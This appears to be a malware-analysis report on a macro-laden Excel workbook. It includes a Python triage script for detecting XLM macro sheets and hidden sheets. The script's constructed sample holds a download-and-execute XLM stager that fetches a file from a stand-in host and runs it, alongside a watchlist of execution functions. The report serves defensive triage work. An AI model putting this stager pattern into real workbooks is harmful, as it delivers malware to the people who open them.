Malicious Office (OOXML) / .XLSM — malware analysis report

Static analysis result for SHA-256 57f1d49d80f45b1a…

MALICIOUS

Office (OOXML) / .XLSM

Size: 47.2 KB
Created: 2021-03-30 11:05:02 UTC
Authoring application (AppVersion from docProps/app.xml): 16.0300
MD5: f23bbdd3ffed3a2ad012141a74e1670f
SHA-1: 6b78ac38574bf5047e90197e2653befbf1d55797
SHA-256: 57f1d49d80f45b1a217c8f83c0877b4d92b338fdddce168071b57375792bd6c2
Risk score: 88

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1059.001 Command and Scripting Interpreter: PowerShell

The file is an XLSM workbook that carries both a VBA project (xl/vbaProject.bin) and an Excel 4.0 (XLM) macro sheet (xl/macrosheets/sheet1.xml), with the macro sheet declared hidden. That combination is a strong indicator of malicious code execution: legitimate modern workbooks almost never contain XLM, and hiding the sheet serves no purpose other than concealment. The macros are most likely a stager intended to download and execute a secondary payload, the usual role of a maldoc in initial access. Confidence in that behavioural assessment is reduced because no command lines, download URLs or payload hashes were recovered from the obfuscated macro content (the only URLs extracted are OOXML schema namespaces), so the download-and-execute conclusion and the PowerShell mapping rest on the document's structure rather than on observed indicators.

Heuristics (4)

  • Excel 4.0 macro sheet (1 sheet) [critical] OOXML_XLM_MACROSHEET
    Spreadsheet contains an Excel 4.0 (XLM) macro sheet, stored as a separate part under xl/macrosheets/ rather than inside the VBA project. XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls, which only inspect vbaProject.bin, until Microsoft disabled XLM macros by default in 2022. Even legitimate XLM use is rare in modern workbooks, so its presence alone is worth a manual look at the carved sheet.
  • VBA project inside OOXML [medium] OOXML_VBA
    Document contains xl/vbaProject.bin (19968 bytes), so VBA macros are present. The decoded source is carved as macros.bas in the extracted artifacts.
  • Hidden worksheet (state: hidden) [low] OOXML_HIDDEN_SHEET
    Excel workbook declares 1 hidden sheet in xl/workbook.xml. Hidden sheets are commonly used to conceal macro code, staging data or intermediate payload construction. The reported state is "hidden" rather than "veryHidden": a hidden sheet can be revealed from the Excel UI (Unhide), whereas a veryHidden sheet can only be exposed through VBA or by editing the XML directly.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; the per-URL channel labels (macro, JS, link annotation, document body, ...) identify which component reached each URL. Every URL listed below is an OOXML or Office XML namespace declaration (xmlns) from the package's XML parts. These appear in any workbook saved by Excel, are never contacted at runtime and carry no indicator value; no network URL was recovered from the macro code.
    • http://schemas.openxmlformats.org/spreadsheetml/2006/main
    • http://schemas.microsoft.com/office/excel/2006/main
    • http://schemas.openxmlformats.org/officeDocument/2006/relationships
    • http://schemas.openxmlformats.org/markup-compatibility/2006
    • http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac
    • http://schemas.microsoft.com/office/spreadsheetml/2014/revision
    • http://schemas.microsoft.com/office/spreadsheetml/2015/revision2
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision3
    • http://schemas.microsoft.com/office/spreadsheetml/2016/revision6
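The four heuristics above can all be reproduced from the zip/XML structure of the OOXML package without Excel or oletools. The script below is an added example written for this page, not the scanner's own code: it lists XLM macro sheets under xl/macrosheets/ and pulls the formulas out of their cells, flagging the XLM functions that give a sheet code-execution or download capability (EXEC, CALL, REGISTER, FORMULA, RUN, URLDownloadToFile, ShellExecute), checks for xl/vbaProject.bin, reads sheet visibility from xl/workbook.xml, and separates schema-namespace URLs from anything else. The workbook it runs on is constructed in memory to mirror this sample's layout (one hidden sheet, one macro sheet, a VBA project stub); the formulas, the example.invalid URL and the file paths in it are invented for illustration and are not taken from the analysed file.

```python
"""Structural triage of an OOXML workbook (.xlsm). Added example; constructed sample data."""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

NS_MAIN = "http://schemas.openxmlformats.org/spreadsheetml/2006/main"
NS_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
NS_XM = "http://schemas.microsoft.com/office/excel/2006/main"  # root namespace of a macrosheet part
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# Hosts that only ever appear in xmlns declarations; not indicators.
SCHEMA_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org", "purl.org"}
# XLM primitives used to build, download or run code (assumed watchlist, not exhaustive).
XLM_SUSPICIOUS = re.compile(r"\b(EXEC|CALL|REGISTER|FORMULA|RUN|URLDOWNLOADTOFILE[AW]?|SHELLEXECUTE[AW]?)\b", re.I)


def triage_xlsm(data: bytes) -> dict:
    """Return the raw structural findings for an OOXML workbook given as bytes."""
    z = zipfile.ZipFile(io.BytesIO(data))
    names = z.namelist()
    r = {"xlm_sheets": [], "xlm_formulas": [], "has_vba": "xl/vbaProject.bin" in names,
         "hidden_sheets": [], "urls": [], "schema_urls": []}
    # 1. XLM macro sheets are their own parts; VBA-only scanners never open them.
    for name in names:
        if name.startswith("xl/macrosheets/") and name.endswith(".xml"):
            r["xlm_sheets"].append(name)
            root = ET.fromstring(z.read(name))
            for f in root.iter(f"{{{NS_MAIN}}}f"):  # <c><f>formula</f></c>, stored without the leading '='
                formula = (f.text or "").strip()
                if formula:
                    r["xlm_formulas"].append((name, formula, bool(XLM_SUSPICIOUS.search(formula))))
    # 2. Sheet visibility: "hidden" is reversible from the UI, "veryHidden" only via VBA/XML.
    if "xl/workbook.xml" in names:
        for sh in ET.fromstring(z.read("xl/workbook.xml")).iter(f"{{{NS_MAIN}}}sheet"):
            state = sh.get("state", "visible")
            if state != "visible":
                r["hidden_sheets"].append((sh.get("name"), state))
    # 3. URLs in every XML part, with namespace bookkeeping kept apart from real targets.
    for name in names:
        if name.endswith((".xml", ".rels")):
            for url in URL_RE.findall(z.read(name).decode("utf-8", "replace")):
                bucket = "schema_urls" if urlparse(url).hostname in SCHEMA_HOSTS else "urls"
                if url not in r[bucket]:
                    r[bucket].append(url)
    return r


def findings(r: dict) -> list:
    """Map triage results onto the heuristic IDs and severities used in this report."""
    out = []
    if r["xlm_sheets"]:
        flagged = [f for _, f, sus in r["xlm_formulas"] if sus]
        out.append(("OOXML_XLM_MACROSHEET", "critical",
                    f"{len(r['xlm_sheets'])} macro sheet(s), {len(flagged)} exec/download formula(s)"))
    if r["has_vba"]:
        out.append(("OOXML_VBA", "medium", "xl/vbaProject.bin present"))
    for name, state in r["hidden_sheets"]:
        out.append(("OOXML_HIDDEN_SHEET", "low", f"sheet {name!r} state={state}"))
    if r["urls"]:
        out.append(("EMBEDDED_URL", "info", ", ".join(r["urls"])))
    return out


def build_sample_xlsm() -> bytes:
    """Constructed workbook mirroring the report's layout. Not the analysed sample."""
    workbook = (f'<workbook xmlns="{NS_MAIN}" xmlns:r="{NS_REL}"><sheets>'
                '<sheet name="Sheet1" sheetId="1" r:id="rId1"/>'
                '<sheet name="Macro1" sheetId="2" state="hidden" r:id="rId2"/></sheets></workbook>')
    macrosheet = (f'<xm:macrosheet xmlns="{NS_MAIN}" xmlns:r="{NS_REL}" xmlns:xm="{NS_XM}"><sheetData>'
                  '<row r="1"><c r="A1"><f>CALL("urlmon","URLDownloadToFileA","JJCCJJ",0,'
                  '"http://example.invalid/stage2.bin","C:\\Users\\Public\\s.exe",0,0)</f><v>0</v></c></row>'
                  '<row r="2"><c r="A2"><f>EXEC("C:\\Users\\Public\\s.exe")</f><v>0</v></c></row>'
                  '<row r="3"><c r="A3"><f>HALT()</f><v>0</v></c></row></sheetData></xm:macrosheet>')
    content_types = ('<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                     '<Override PartName="/xl/macrosheets/sheet1.xml" ContentType="application/vnd.ms-excel.macrosheet+xml"/>'
                     '<Override PartName="/xl/vbaProject.bin" ContentType="application/vnd.ms-office.vbaProject"/></Types>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", content_types)
        z.writestr("xl/workbook.xml", workbook)
        z.writestr("xl/macrosheets/sheet1.xml", macrosheet)
        z.writestr("xl/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24)  # OLE2 magic, stub body
    return buf.getvalue()


if __name__ == "__main__":
    result = triage_xlsm(build_sample_xlsm())
    for sheet, formula, suspicious in result["xlm_formulas"]:
        print(f"{sheet}: {'!! ' if suspicious else '   '}{formula}")
    for hid, severity, detail in findings(result):
        print(f"[{severity}] {hid}: {detail}")
```

Against a real file, replace build_sample_xlsm() with open(path, "rb").read(); the detection relies only on part paths and the spreadsheetml namespace, so it also works on files whose [Content_Types].xml has been tampered with. The formula watchlist is a triage aid: XLM stagers typically assemble the real EXEC/CALL string at runtime from scattered cells via FORMULA, so a sheet with many FORMULA calls and no visible EXEC still warrants emulation (for example with XLMMacroDeobfuscator) rather than a clean verdict.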

Extracted artifacts (3)

Files carved from inside the sample during analysis.

  • macros.bas
    SHA-256: 450c01b878e67643071adef3ee10e7e563781cb0ba25a4b2f01a445cfa10dcc5
    Kind: vba-macro
    Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
    Size: 2181 bytes
  • vbaProject_00.bin
    SHA-256: cf5dda536b2336481bd2660a8a4b697a78f10980fff2283046d24de3f4a11530
    Kind: vba-project
    Source: OOXML VBA project: xl/vbaProject.bin
    Size: 19968 bytes
  • xlm_sheet_00.xml
    SHA-256: afc8104838fdd48e32bb26e8c2388ef4ce4fa18f13b1c354d0a2f2c6f773fadc
    Kind: xlm-macrosheet
    Source: OOXML XLM macro sheet: xl/macrosheets/sheet1.xml
    Size: 1133 bytes